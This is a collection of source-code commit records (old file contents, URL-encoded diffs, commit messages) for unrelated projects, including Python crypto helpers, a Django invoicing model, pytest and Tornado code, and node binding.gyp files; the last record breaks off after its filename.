import hashlib import math import base64 from Crypto.Cipher import DES, AES from Crypto import Random random_instance = Random.new() algorithms = {'aes': AES, 'des': DES} def sha1(message): return hashlib.sha1(message).hexdigest() def md5(message): return hashlib.md5(message).hexdigest() def sha256(message): return hashlib.sha256(message).hexdigest() def sha512(message): return hashlib.sha152(message).hexdigest() def str_to_base64(message): return base64.b64encode(message) def base64_to_str(message): return base64.b64decode(message) def pad(message, length, padding=' '): return message + (length - len(message)) * padding def pad_multiple(message, len_multiple, padding=' '): next_length = math.ceil(len(message) / float(len_multiple)) * len_multiple return pad(message, int(next_length), padding) def random(n_bytes): return random_instance.read(n_bytes) def encrypt(message, password, algorithm='aes'): cls = algorithms[algorithm] iv = random(cls.block_size) instance = cls.new(pad_multiple(password, 16), cls.MODE_CFB, iv) return str_to_base64(iv + instance.encrypt(message)) def decrypt(message, password, algorithm='aes'): message = base64_to_str(message) iv, message = message[:AES.block_size], message[AES.block_size:] instance = AES.new(pad_multiple(password, 16), AES.MODE_CFB, iv) return instance.decrypt(message) def encrypt_aes(message, password): return encrypt(message, password, 'aes') def decrypt_aes(message, password): return decrypt(message, password, 'aes')
Python
0
@@ -24,21 +24,47 @@ ath%0A -import base64 +from base64 import b64encode, b64decode %0Afro @@ -498,23 +498,16 @@ return -base64. b64encod @@ -561,15 +561,8 @@ urn -base64. b64d @@ -573,24 +573,48 @@ e(message)%0A%0A +base64 = str_to_base64%0A%0A def pad(mess @@ -1681,28 +1681,192 @@ t(message, password, 'aes')%0A +%0Adef encrypt_des(message, password):%0A return encrypt(message, password, 'des')%0A%0Adef decrypt_des(message, password):%0A return decrypt(message, password, 'des')%0A
1bd814df2c5175ac7745b2d58fbe6b82c5a941ae
add 'debug' hack
sts/util/console.py
sts/util/console.py
BEGIN = '\033[1;' END = '\033[1;m' class color(object): GRAY, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, CRIMSON = map(lambda num : BEGIN + str(num) + "m", range(30, 39)) B_GRAY, B_RED, B_GREEN, B_YELLOW, B_BLUE, B_MAGENTA, B_CYAN, B_WHITE, B_CRIMSON = map(lambda num: BEGIN + str(num) + "m", range(40, 49)) NORMAL = END class msg(): global_io_master = None BEGIN = '\033[1;' END = '\033[1;m' GRAY, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, CRIMSON = map(lambda num: str(num) + "m", range(30, 39)) B_GRAY, B_RED, B_GREEN, B_YELLOW, B_BLUE, B_MAGENTA, B_CYAN, B_WHITE, B_CRIMSON = map(lambda num: str(num) + "m", range(40, 49)) @staticmethod def interactive(message): # todo: would be nice to simply give logger a color arg, but that doesn't exist... print msg.BEGIN + msg.WHITE + message + msg.END @staticmethod def event(message): print msg.BEGIN + msg.CYAN + message + msg.END @staticmethod def raw_input(message): prompt = msg.BEGIN + msg.WHITE + message + msg.END if msg.global_io_master: return msg.global_io_master.raw_input(prompt) else: return raw_input(prompt) @staticmethod def success(message): print msg.BEGIN + msg.B_GREEN + msg.BEGIN + msg.WHITE + message + msg.END @staticmethod def fail(message): print msg.BEGIN + msg.B_RED + msg.BEGIN + msg.WHITE + message + msg.END @staticmethod def set_io_master(io_master): msg.global_io_master = io_master @staticmethod def unset_io_master(): msg.global_io_master = None
Python
0.000001
@@ -1060,22 +1060,19 @@ :%0A -return +s = msg.glo @@ -1123,14 +1123,11 @@ -return +s = raw @@ -1142,16 +1142,90 @@ rompt)%0A%0A + if s == %22debug%22:%0A import pdb%0A pdb.set_trace()%0A return s%0A%0A @stati
4987412578744db64984cb40841994b3852287f7
update evalrunner
pytools/src/IndexEval/evalrunner.py
pytools/src/IndexEval/evalrunner.py
''' Created on 04.11.2015 @author: selen00r ''' import datetime from pymongo.mongo_client import MongoClient import evalresult class EvalRunner(object): ''' Base class to run an evaluation of an index. ''' def __init__(self): ''' Constructor ''' self.dbName = "indexdb" self.idxDax = "dax" self.idxMDax = "mdax" self.idxTecDax = "tecdax" self.idxSP500 = "sp500" self.idxNasdaq100 = "nasdaq100" self.idxEStoxx50 = "estoxx50" self.idxNikkei = "nikkei" self.idxSMI = "smi" self.idxATX = "atx" self.idxCAC = "cac" self.idxDowJones = "dowjones" self.idxFTS100 = "fts100" self.idxFtseMib = "ftsemib" self.idxHangSeng = "hangseng" self.idxIbex = "ibex" self.allIndices = [self.idxATX, self.idxCAC, self.idxDax, self.idxDowJones, self.idxEStoxx50, self.idxFTS100, self.idxFtseMib, self.idxHangSeng, self.idxIbex, self.idxMDax, self.idxNasdaq100, self.idxNikkei, self.idxSMI, self.idxTecDax] def setUp(self): self.mongoClient = MongoClient() self.database = self.mongoClient[self.dbName] self.startDate = datetime.datetime( 2000, 1, 1 ) self.endDate = datetime.datetime( 2015, 10, 1 ) self.startInvest = 1000.0 self.fixedInvest = True self.excludeChecker = evalresult.ExcludeTransaction() self.resultCalculator = evalresult.ResultCalculator() self.resultCalculatorEuro = evalresult.ResultCalculatorEuro(self.startInvest, self.fixedInvest) def tearDown(self): pass
Python
0
@@ -359,19 +359,19 @@ self.idx -Dax +ATX @@ -374,18 +374,18 @@ = %22 -d a +t x%22%0D%0A @@ -396,20 +396,20 @@ self.idx -MDax +CAC @@ -415,12 +415,11 @@ = %22 -mdax +cac %22%0D%0A @@ -433,22 +433,22 @@ self.idx -Tec Dax + = @@ -452,11 +452,8 @@ = %22 -tec dax%22 @@ -474,112 +474,113 @@ .idx -SP500 = %22sp500%22%0D%0A self.idxNasdaq100 = %22nasdaq100%22%0D%0A self.idxEStoxx50 = %22estoxx5 +DowJones = %22dowjones%22%0D%0A self.idxEStoxx50 = %22estoxx50%22%0D%0A self.idxFTS100 = %22ftse10 0%22%0D%0A @@ -599,29 +599,30 @@ .idx -Nikkei +FtseMib - = %22 -nikkei +ftsemib %22%0D%0A @@ -640,26 +640,31 @@ .idx -SMI = %22smi +HangSeng = %22hangseng %22%0D%0A @@ -670,36 +670,36 @@ self.idx -ATX +Ibex = %22atx%22%0D @@ -685,34 +685,35 @@ xIbex = %22 -at +ibe x%22%0D%0A self @@ -708,36 +708,36 @@ self.idx -CAC +MDax = %22cac%22%0D @@ -723,35 +723,36 @@ xMDax = %22 -cac +mdax %22%0D%0A self. @@ -754,39 +754,40 @@ self.idx -DowJones = %22dowjones +Nasdaq100 = %22nasdaq100 %22%0D%0A @@ -789,38 +789,38 @@ self.idx -FTS100 +Nikkei = %22fts100%22 @@ -816,14 +816,14 @@ = %22 -fts100 +nikkei %22%0D%0A @@ -837,38 +837,34 @@ self.idx -FtseMib +SMI + = %22 -ftse +s mi -b %22%0D%0A @@ -874,39 +874,36 @@ self.idx -HangSeng +SP500 + = %22 -hangseng +sp500 %22%0D%0A @@ -913,34 +913,36 @@ self.idx -Ibe +TecDa x - = %22 -ibe +tecda x%22%0D%0A%0D%0A @@ -1469,17 +1469,17 @@ 2015, 1 -0 +2 , 1 )%0D%0A%0D @@ -1819,8 +1819,12 @@ pass +%0D%0A%0D%0A
5ba73b9dd92b55b3f02f76ae981e53744abac750
Add an option to time SQL statements
sir/__main__.py
sir/__main__.py
# Copyright (c) 2014 Wieland Hoffmann # License: MIT, see LICENSE for details import argparse import logging import multiprocessing from . import config from .indexing import reindex from .schema import SCHEMA from sqlalchemy import exc as sa_exc logger = logging.getLogger("sir") def watch(args): raise NotImplementedError def main(): loghandler = logging.StreamHandler() formatter = logging.Formatter(fmt="%(processName)s %(asctime)s %(levelname)s: %(message)s") loghandler.setFormatter(formatter) logger.addHandler(loghandler) mplogger = multiprocessing.get_logger() mplogger.setLevel(logging.ERROR) mplogger.addHandler(loghandler) parser = argparse.ArgumentParser() parser.add_argument("-d", "--debug", action="store_true") subparsers = parser.add_subparsers() reindex_parser = subparsers.add_parser("reindex", help="Reindexes all or a single entity type") reindex_parser.set_defaults(func=reindex) reindex_parser.add_argument('--entities', action='append', help="""Which entity types to index. Available are: %s""" % (", ".join(SCHEMA.keys()))) watch_parser = subparsers.add_parser("watch", help="Watches for incoming messages on an AMQP queue") watch_parser.set_defaults(func=watch) args = parser.parse_args() if args.debug: logging.getLogger("sqlalchemy.engine").setLevel(logging.DEBUG) logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) config.read_config() func = args.func args = vars(args) func(args["entities"]) if __name__ == '__main__': main()
Python
0.000014
@@ -768,24 +768,85 @@ tore_true%22)%0A + parser.add_argument(%22--sqltimings%22, action=%22store_true%22)%0A subparse @@ -1392,79 +1392,8 @@ ug:%0A - logging.getLogger(%22sqlalchemy.engine%22).setLevel(logging.DEBUG)%0A @@ -1475,16 +1475,986 @@ g.INFO)%0A +%0A if args.sqltimings:%0A from sqlalchemy import event%0A from sqlalchemy.engine import Engine%0A import time%0A%0A sqltimelogger = logging.getLogger(%22sqltimer%22)%0A sqltimelogger.setLevel(logging.DEBUG)%0A sqltimelogger.addHandler(loghandler)%0A%0A @event.listens_for(Engine, %22before_cursor_execute%22)%0A def before_cursor_execute(conn, cursor, statement,%0A parameters, context, executemany):%0A conn.info.setdefault('query_start_time', %5B%5D).append(time.time())%0A sqltimelogger.debug(%22Start Query: %25s%22 %25 statement)%0A%0A @event.listens_for(Engine, %22after_cursor_execute%22)%0A def after_cursor_execute(conn, cursor, statement,%0A parameters, context, executemany):%0A total = time.time() - conn.info%5B'query_start_time'%5D.pop(-1)%0A sqltimelogger.debug(%22Query Complete!%22)%0A sqltimelogger.debug(%22Total Time: %25f%22 %25 total)%0A%0A conf
dde133a9ae751ce3caab8e8896c1e04e48c0cc1e
fix typo
qiita_pet/handlers/base_handlers.py
qiita_pet/handlers/base_handlers.py
from tornado.web import RequestHandler class BaseHandler(RequestHandler): def get_current_user(self): '''Overrides default method of returning user curently connected''' user = self.get_secure_cookie("user") if user is None: self.clear_cookie("user") return None else: return user.strip('" ') def write_error(self, status_code, **kwargs): '''Overrides the error page created by Tornado''' from traceback import format_exception if self.settings.get("debug") and "exc_info" in kwargs: exc_info = kwargs["exc_info"] trace_info = ''.join(["%s<br />" % line for line in format_exception(*exc_info)]) request_info = ''.join(["<strong>%s</strong>: %s<br />" % (k, self.request.__dict__[k]) for k in self.request.__dict__.keys()]) error = exc_info[1] self.render('error.html', error=error, trace_info=trace_info, request_info=request_info, user=self.current_user) def head(self): """Adds proper resonse for head requests""" self.finish() class MainHandler(BaseHandler): '''Index page''' def get(self): username = self.current_user completedanalyses = [] self.render("index.html", user=username, analyses=completedanalyses) class MockupHandler(BaseHandler): def get(self): self.render("mockup.html", user=self.current_user) class NoPageHandler(BaseHandler): def get(self): self.render("404.html", user=self.current_user)
Python
0.999991
@@ -1214,16 +1214,17 @@ oper res +p onse for
2850768bcc18dd8628211ad72af4c9de5df13ad9
Increase job watcher cancel button width. (#3708)
qiskit/tools/jupyter/job_widgets.py
qiskit/tools/jupyter/job_widgets.py
# -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2017, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """A module of widgets for job tracking""" import ipywidgets as widgets from IPython.display import display, Javascript def make_clear_button(watcher): """Makes the clear button Args: watcher (widget): The watcher widget instance. Returns: widget: The clear button widget. """ clear = widgets.Button( description='Clear', button_style='primary', layout=widgets.Layout(width='70px', grid_area='right', padding="0px 0px 0px 0px")) def on_clear_button_clicked(_): watcher.clear_done() clear.on_click(on_clear_button_clicked) clear_button = widgets.GridBox(children=[clear], layout=widgets.Layout( width='100%', grid_template_columns='20% 20% 20% 20% 20%', grid_template_areas=''' ". . . . right " ''')) return clear_button def make_labels(): """Makes the labels widget. Returns: widget: The labels widget. """ labels0 = widgets.HTML(value="<h5>Job ID</h5>", layout=widgets.Layout(width='190px')) labels1 = widgets.HTML(value='<h5>Backend</h5>', layout=widgets.Layout(width='145px')) labels2 = widgets.HTML(value='<h5>Status</h5>', layout=widgets.Layout(width='95px')) labels3 = widgets.HTML(value='<h5>Queue</h5>', layout=widgets.Layout(width='70px')) labels4 = widgets.HTML(value='<h5>Message</h5>') labels = widgets.HBox(children=[labels0, labels1, labels2, labels3, labels4], layout=widgets.Layout(width='600px', margin='0px 0px 0px 35px')) return labels def create_job_widget(watcher, job, backend, status='', queue_pos=None, msg=''): """Creates a widget corresponding to a particular job instance. Args: watcher (widget): The job watcher instance. job (IBMQJob): The job. backend (str): The backend the job is running on. status (str): The job status. queue_pos (int): Queue position, if any. msg (str): Job message, if any. Returns: widget: The job widget """ job_id = job.job_id() id_label = widgets.HTML(value="{}".format(job_id), layout=widgets.Layout(width='190px')) backend_label = widgets.HTML(value="{}".format(backend), layout=widgets.Layout(width='145px')) status_label = widgets.HTML(value="{}".format(status), layout=widgets.Layout(width='95px')) if queue_pos is None: queue_pos = '-' else: queue_pos = str(queue_pos) queue_label = widgets.HTML(value="{}".format(queue_pos), layout=widgets.Layout(width='70px')) msg_label = widgets.HTML(value="<p style=white-space:nowrap;>{}</p>".format(msg), layout=widgets.Layout(overflow_x='scroll')) close_button = widgets.Button(button_style='', icon='close', layout=widgets.Layout(width='30px', margin="0px 5px 0px 0px")) close_button.style.button_color = 'white' def cancel_on_click(_): watcher.cancel_job(job_id) close_button.on_click(cancel_on_click) job_grid = widgets.HBox(children=[close_button, id_label, backend_label, status_label, queue_label, msg_label], layout=widgets.Layout(min_width='700px', max_width='700px')) job_grid.job_id = job_id job_grid.job = job return job_grid def build_job_viewer(): """Builds the job viewer widget Returns: widget: Job viewer. """ acc = widgets.Accordion(children=[widgets.VBox(layout=widgets.Layout(max_width='710px', min_width='710px'))], layout=widgets.Layout(width='auto', max_width='750px', max_height='500px', overflow_y='scroll', overflow_x='hidden')) acc.set_title(0, 'IBMQ Jobs') acc.selected_index = None acc.layout.visibility = 'hidden' display(acc) acc._dom_classes = ['job_widget'] display(Javascript("""$('div.job_widget') .detach() .appendTo($('#header')) .css({ 'z-index': 999, 'position': 'fixed', 'box-shadow': '5px 5px 5px -3px black', 'opacity': 0.95, 'float': 'left,' }) """)) acc.layout.visibility = 'visible' return acc
Python
0
@@ -2449,17 +2449,17 @@ px 0px 3 -5 +7 px'))%0A @@ -3880,17 +3880,17 @@ width='3 -0 +2 px',%0A
5763cb2f95b731933263f0dd38fbffff6f71147c
Add default_diff and timeout to plugin
tests/examples/examples_report_plugin.py
tests/examples/examples_report_plugin.py
from __future__ import absolute_import import pytest import jinja2 import os import re import sys from os.path import join, dirname from py.xml import html from ..constants import __version__ from ..utils import write, green from .utils import no_ext, human_bytes PY3 = sys.version_info[0] == 3 def pytest_addoption(parser): parser.addoption( "--examplereport", action='store', dest='examplereport', metavar='path', default=None, help='create examples html report file at given path.' ) parser.addoption( "--patterns", type=str, nargs="*", help="select a subset of examples to test" ) parser.addoption( "--bokeh-port", type=int, default=5006, help="port on which Bokeh server resides" ) parser.addoption( "--notebook-port", type=int, default=6007, help="port on which Jupyter Notebook server resides" ) parser.addoption( "--phantomjs", type=str, default="phantomjs", help="phantomjs executable" ) parser.addoption( "--timeout", type=int, default=default_timeout, help="how long can an example run (in seconds)" ) parser.addoption( "--all-notebooks", action="store_true", default=False, help="test all the notebooks inside examples/plotting/notebook folder." ) parser.addoption( "--output-cells", type=str, choices=['complain', 'remove', 'ignore'], default='complain', help="what to do with notebooks' output cells" ) parser.addoption( "--log-file", default='examples.log', help="where to write the complete log" ) parser.addoption( "--diff", type=str, default=default_diff, help="compare generated images against this ref" ) def pytest_configure(config): examplereport = config.option.examplereport # prevent opening htmlpath on slave nodes (xdist) if examplereport and not hasattr(config, 'slaveinput'): config.examplereport = ExamplesTestReport(examplereport) config.pluginmanager.register(config.examplereport) def pytest_unconfigure(config): examplereport = getattr(config, 'examplereport', None) if examplereport: del config.examplereport config.pluginmanager.unregister(html) class ExamplesTestReport(object): def __init__(self, examplereport): examplereport = os.path.expanduser(os.path.expandvars(examplereport)) self.examplereport = os.path.abspath(examplereport) self.entries = [] self.errors = self.failed = 0 self.passed = self.skipped = 0 self.xfailed = self.xpassed = 0 def _appendrow(self, result, report): skipped = False failed = False if result == 'Failed': failed = True if result == 'Skipped': skipped = True # Example is the path of the example that was run # It can be got from the report.location attribute which is a tuple # that looks # something like this: # ('tests/examples/test_examples.py', 49, 'test_file_examples[/Users/caged/Dev/bokeh/bokeh/examples/models/anscombe.py]') example = re.search(r'\[(.*?)\]', report.location[2]).group(1) example_path = no_ext(example) diff = pytest.config.option.diff png_file = "%s-%s.png" % (example_path, __version__) png_diff = "%s-%s-diff.png" % (example_path, __version__) ref_png = "%s-%s.png" % (example_path, diff) self.entries.append((example_path, diff, failed, skipped, png_file, png_diff, ref_png)) write(green("---") + " " + example) def append_pass(self, report): self.passed += 1 self._appendrow('Passed', report) def append_failure(self, report): if hasattr(report, "wasxfail"): self._appendrow('XPassed', report) self.xpassed += 1 else: self._appendrow('Failed', report) self.failed += 1 def append_error(self, report): self._appendrow('Error', report) self.errors += 1 def append_skipped(self, report): if hasattr(report, "wasxfail"): self._appendrow('XFailed', report) self.xfailed += 1 else: self._appendrow('Skipped', report) self.skipped += 1 def pytest_runtest_logreport(self, report): if report.passed: if report.when == 'call': self.append_pass(report) elif report.failed: if report.when != "call": self.append_error(report) else: self.append_failure(report) elif report.skipped: self.append_skipped(report) def pytest_sessionfinish(self, session): with open(join(dirname(__file__), "examples_report.jinja")) as f: template = jinja2.Template(f.read()) html = template.render(version=__version__, entries=self.entries) if not os.path.exists(os.path.dirname(self.examplereport)): os.makedirs(os.path.dirname(self.examplereport)) with open(self.examplereport, 'w', encoding='utf-8') as f: f.write(html) if pytest.config.option.upload: report_size = len(html) write("%s Uploading report (%s) ..." % (green(">>>"), human_bytes(report_size))) # Does not currently upload report def pytest_terminal_summary(self, terminalreporter): terminalreporter.write_sep('-', 'generated example report: {0}'.format( self.examplereport))
Python
0
@@ -187,16 +187,47 @@ ersion__ +, default_diff, default_timeout %0Afrom ..
6fbb50fcb851d0387d44dbaca361cc63f1dbbe79
Add get_db_query method.
loldb/v2/resources.py
loldb/v2/resources.py
import collections import os import re import sqlite3 import raf def _get_highest_version(versions): versions = [(v, v.split('.')) for v in versions] def version_converter(version): try: parts = map(int, version[1]) except ValueError: return None else: return [parts, version[0]] versions = map(version_converter, versions) versions = filter(lambda x: x is not None, versions) versions = sorted(versions) if not versions: raise RuntimeError("No valid version.") return versions[-1][1] def _make_re_pattern(token_str, flags=None): """Converts spacing in token_str to variable-length, compiles.""" return re.compile(r'\s*'.join(token_str.split()), flags) def _build_path( base_path, project="lol_air_client", subdir='releases', version=None): """Generate path for most recent release of a project.""" subdir = subdir.lower() path = [base_path, "RADS/projects", project, subdir] if subdir != 'filearchives': if version is None: current_base = os.path.join(*path) versions = os.listdir(current_base) versions = [v for v in versions if os.path.isdir(os.path.join(current_base, v))] version = _get_highest_version(versions) path.append(version) return os.path.join(*path) class ResourceProvider(object): def __init__(self, lol_path, language='en_US'): self.base_path = lol_path self.language = language self.db = None self.raf = None self.font_config = None def _get_db_path(self): return os.path.join( _build_path(self.base_path), # TODO: Is /bin used on Windows? 'deploy/bin/assets/data/gameStats', 'gameStats_%s.sqlite' % self.language, ) def _get_raf_path(self): return _build_path( self.base_path, 'lol_game_client', 'filearchives' ) def get_db(self): """Get connection to gameStats database.""" if self.db is None: self.db = sqlite3.connect(self._get_db_path()) return self.db def get_db_rows(self, table): """Get the rows from a gameStats database table.""" connection = self.get_db() cursor = connection.cursor() # execute doesn't accept a parametrized table name rows = cursor.execute("SELECT * FROM `%s`" % table) # Get column names from cursor columns = [c[0] for c in cursor.description] row_class = collections.namedtuple('Row', columns) for row in rows: row = row_class(*row) yield row def get_raf_master(self): """Get RAFMaster instance for game client.""" if self.raf is None: self.raf = raf.RAFMaster(self._get_raf_path()) return self.raf def get_font_config(self): """Get font_config dictionary.""" if self.font_config is None: archive = self.get_raf_master() font_config = {} font_config_text = archive.find(name='fontconfig_en_US.txt').read() font_config_re = _make_re_pattern('^ tr "([^"]+)" = "(.+)" $', re.M) for match in font_config_re.finditer(font_config_text): font_config[match.group(1)] = match.group(2) self.font_config = font_config return self.font_config class MacResourceProvider(ResourceProvider): def __init__(self, lol_path=None, **kwargs): if lol_path is None: lol_path = "/Applications/League of Legends.app/Contents/LOL" super(MacResourceProvider, self).__init__(lol_path, **kwargs) class WindowsResourceProvider(ResourceProvider): pass
Python
0
@@ -2262,24 +2262,25 @@ _db_ -rows +query (self, -table +query ):%0A @@ -2328,21 +2328,21 @@ atabase -table +query .%22%22%22%0A @@ -2503,36 +2503,13 @@ ute( -%22SELECT * FROM %60%25s%60%22 %25 table +query )%0A%0A @@ -2718,16 +2718,16 @@ s(*row)%0A - @@ -2741,16 +2741,174 @@ ld row%0A%0A + def get_db_rows(self, table):%0A %22%22%22Get the rows from a gameStats database table.%22%22%22%0A return self.get_db_query(%22SELECT * FROM %60%25s%60%22 %25 table)%0A%0A def
3968a526dea052008b608004b9bde8ee7d55309c
Fix type in FileFields
django_afip/models.py
django_afip/models.py
from django.db import models class GenericAfipType(models.Model): code = models.CharField(max_length=3) description = models.CharField(max_length=250) valid_from = models.DateField() valid_to = models.DateField() class Meta: abstract = True class ReceiptType(GenericAfipType): pass class ConceptType(GenericAfipType): pass class DocumentType(GenericAfipType): pass class VatType(GenericAfipType): pass class TaxType(GenericAfipType): pass class CurrencyType(GenericAfipType): pass class TaxPayer(models.Model): name = models.CharField(max_length=32) key = models.FieldField( null=True, ) certificate = models.FieldField( null=True, ) cuit = models.PositiveSmallIntegerField() class SalesPoint(models.Model): number = models.PositiveSmallIntegerField() issuance_type = models.CharField(max_length=8) # FIXME blocked = models.BooleanField() drop_date = models.DateField() owner = models.ForeignKey(TaxPayer) class ReceiptBatch(models.Model): """ Receipts are validated sent in batches. """ amount = models.PositiveSmallIntegerField() receipt_type = models.ForeignKey(ReceiptType) sales_point = models.ForeignKey(SalesPoint) owner = models.ForeignKey(TaxPayer) class Receipt(models.Model): """ An AFIP-related document (eg: invoice). """ pack = models.ForeignKey( ReceiptBatch, related_name='details', null=True, ) concept = models.ForeignKey( ConceptType, related_name='documents', ) document_type = models.ForeignKey( DocumentType, related_name='documents', ) document_number = models.BigIntegerField() from_invoice = models.PositiveIntegerField( null=True, ) to_invoice = models.PositiveIntegerField( null=True, ) date = models.DateField() net_untaxed = models.DecimalField( max_digits=15, decimal_places=2, ) net_taxed = models.DecimalField( max_digits=15, decimal_places=2, ) exempt_amount = models.DecimalField( max_digits=15, decimal_places=2, ) tax_amount = models.DecimalField( max_digits=15, decimal_places=2, ) service_from_date = models.DateField() service_to_date = models.DateField() expiration_date = models.DateField() currency = models.ForeignKey( CurrencyType, related_name='documents', ) currency_quote = models.DecimalField( max_digits=10, decimal_places=6, ) related_receipts = models.ManyToManyField( 'Receipt', ) # optionals @property def total(self): pass class Tax(models.Model): tax_type = models.ForeignKey(TaxType) description = models.CharField(max_length=80) base_amount = models.DecimalField( max_digits=15, decimal_places=2, ) aliquot = models.DecimalField( max_digits=5, decimal_places=2, ) amount = models.DecimalField( max_digits=15, decimal_places=2, ) receipt = models.ForeignKey(Receipt) class Vat(models.Model): vat_type = models.ForeignKey(VatType) base = models.DecimalField( max_digits=15, decimal_places=2, ) amount = models.DecimalField( max_digits=15, decimal_places=2, ) receipt = models.ForeignKey(Receipt) class Validation(models.Model): RESULT_APPROVED = 'A' RESULT_REJECTED = 'R' RESULT_PARTIAL = 'P' processed_date = models.DateField() result = models.CharField( max_length=1, choices=( (RESULT_APPROVED, 'Aprovado'), (RESULT_REJECTED, 'Rechazado'), (RESULT_PARTIAL, 'Parcial'), ), ) batch = models.ForeignKey( ReceiptBatch, related_name='validations' ) class Observation(models.Model): code = models.PositiveSmallIntegerField() message = models.CharField(max_length=255) class ReceiptValidation(models.Model): validation = models.ForeignKey(Validation) result = models.CharField( max_length=1, choices=( (Validation.RESULT_APPROVED, 'Aprovado'), (Validation.RESULT_REJECTED, 'Rechazado'), (Validation.RESULT_PARTIAL, 'Parcial'), ), ) cae = models.CharField(max_length=14) cae_expiration = models.DateTimeField() observations = models.ForeignKey(Observation) receipt = models.ForeignKey( Receipt, related_name='validations', )
Python
0.000001
@@ -627,35 +627,34 @@ key = models.Fi +l e -ld Field(%0A n @@ -696,19 +696,18 @@ odels.Fi +l e -ld Field(%0A
b2ec61003a7df4ebc46d40a3d72e262440c5008d
version 1.1.0
django_th/__init__.py
django_th/__init__.py
VERSION = (1, 0, 0) # PEP 386 __version__ = ".".join([str(x) for x in VERSION]) default_app_config = 'django_th.apps.DjangoThConfig'
Python
0.000002
@@ -7,17 +7,17 @@ N = (1, -0 +1 , 0) #
45ab8a3585008cc4ad31eb553b9291f4e1a65c01
Update C++ version, #190
binding.gyp
binding.gyp
{ "variables": { "os_linux_compiler%": "gcc", "use_vl32%": "false", "use_fixed_size%": "false", "use_posix_semaphores%": "false" }, "targets": [ { "target_name": "node-lmdb", "win_delay_load_hook": "false", "sources": [ "dependencies/lmdb/libraries/liblmdb/mdb.c", "dependencies/lmdb/libraries/liblmdb/midl.c", "src/node-lmdb.cpp", "src/env.cpp", "src/misc.cpp", "src/txn.cpp", "src/dbi.cpp", "src/cursor.cpp" ], "include_dirs": [ "<!(node -e \"require('nan')\")", "dependencies/lmdb/libraries/liblmdb" ], "conditions": [ ["OS=='linux'", { "variables": { "gcc_version" : "<!(<(os_linux_compiler) -dumpversion | cut -d '.' -f 1)", }, "conditions": [ ["gcc_version>=7", { "cflags": [ "-Wimplicit-fallthrough=2", ], }], ], "ldflags": [ "-fPIC", "-fvisibility=hidden" ], "cflags": [ "-fPIC", "-fvisibility=hidden" ], "cflags_cc": [ "-fPIC", "-fvisibility=hidden", "-fvisibility-inlines-hidden", "-std=c++0x" ] }], ["OS=='mac'", { "conditions": [ ["use_posix_semaphores=='true'", { "defines": ["MDB_USE_POSIX_SEM"] }] ], "xcode_settings": { "OTHER_CPLUSPLUSFLAGS" : ["-std=c++11"], "MACOSX_DEPLOYMENT_TARGET": "10.7", "OTHER_LDFLAGS": ["-std=c++11"], "CLANG_CXX_LIBRARY": "libc++" } }], ["OS=='win'", { "libraries": ["ntdll.lib"] }], ["use_fixed_size=='true'", { "defines": ["MDB_FIXEDSIZE"], }], ["use_vl32=='true'", { "conditions": [ ["target_arch=='ia32'", { "defines": ["MDB_VL32"] }] ] }], ], } ] }
Python
0
@@ -1327,10 +1327,10 @@ =c++ -0x +14 %22%0A @@ -1593,33 +1593,33 @@ S%22 : %5B%22-std=c++1 -1 +4 %22%5D,%0A @@ -1694,17 +1694,17 @@ std=c++1 -1 +4 %22%5D,%0A
9c950c73bdc518c35aa471834431222c7c60ea4b
update binding.gyp
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "ons", "sources": [ "src/entry.cpp", "src/ons_options.cpp", "src/consumer_ack.cpp", "src/consumer.cpp", "src/producer.cpp", "src/consumer_listener.cpp" ], "include_dirs": [ "src/third_party/include", "<!(node -e \"require('nan')\")" ], "conditions": [ ["OS==\"mac\"", { "cflags!": [ "-fno-exceptions" ], "cflags_cc!": [ "-fno-exceptions", "-pthread", "-Wl,--no-as-needed", "-ldl" ], "cflags_cc": [ "-Wno-ignored-qualifiers" ], "cflags": [ "-std=c++11", "-stdlib=libc++" ], "include_dirs": [ "/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/include/c++/v1" ], "xcode_settings": { "GCC_ENABLE_CPP_EXCEPTIONS": "YES" } }], ["OS==\"linux\"", { "libraries": [ "../src/third_party/lib/linux/libonsclient4cpp.a" ], "cflags_cc!": [ "-fno-exceptions", "-pthread", "-Wl,--no-as-needed", "-ldl" ], "cflags_cc": [ "-Wno-ignored-qualifiers" ], "cflags": [ "-std=c++11" ] }], ["OS==\"win\"", { "conditions": [ ["target_arch==\"ia32\"", { "libraries": [ "../src/third_party/lib/windows/32x/ONSClient4CPP.lib" ], "copies": [ { "destination": "<(module_root_dir)/build/Release/", "files": [ "<(module_root_dir)/src/third_party/lib/windows/32x/ONSClient4CPP.dll" ] } ] }], ["target_arch==\"x64\"", { "libraries": [ "../src/third_party/lib/windows/64x/ONSClient4CPP.lib" ], "copies": [ { "destination": "<(module_root_dir)/build/Release/", "files": [ "<(module_root_dir)/src/third_party/lib/windows/64x/ONSClient4CPP.dll" ] } ] }] ] }] ] } ] }
Python
0
@@ -308,16 +308,65 @@ ner.cpp%22 +,%0A %22src/third_party/sole/sole.cpp%22 %0A @@ -447,16 +447,56 @@ clude%22,%0A + %22src/third_party/sole%22,%0A
f0f3a7ab0b285f447f0573ff537e6252a8752528
Use pkg-build in binding.gyp
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "tiff-multipage", "sources": [ "src/module.cc", "src/sync.cc", "src/async.cc", "src/tiff_multipage.cc" ], "include_dirs": ["<!(node -e \"require('nan')\")"], "libraries": [ "-ltiff" ] } ] }
Python
0
@@ -272,16 +272,33 @@ dirs%22: %5B +%0A %22%3C!(node @@ -321,16 +321,104 @@ an')%5C%22)%22 +,%0A %22%3C!@(pkg-config libtiff-4 --cflags-only-I %7C sed s/-I//g)%22%0A %5D,%0A @@ -463,16 +463,68 @@ %22-ltiff%22 +,%0A %22%3C!@(pkg-config --libs libtiff-4)%22 %0A
c34f040ba19c27277d6cc9a1ad46e4c8d668e77b
Apply -DNDEBUG globally on release builds
binding.gyp
binding.gyp
